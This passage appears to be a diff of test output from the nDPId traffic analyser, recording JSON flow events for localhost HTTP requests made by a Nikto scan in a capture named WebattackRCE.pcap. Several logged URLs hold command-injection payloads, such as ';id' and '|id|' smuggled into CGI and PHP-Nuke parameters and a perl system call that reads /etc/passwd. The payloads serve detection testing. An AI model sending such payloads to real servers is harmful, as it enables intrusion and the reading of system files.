00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} +01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} +01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} +01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 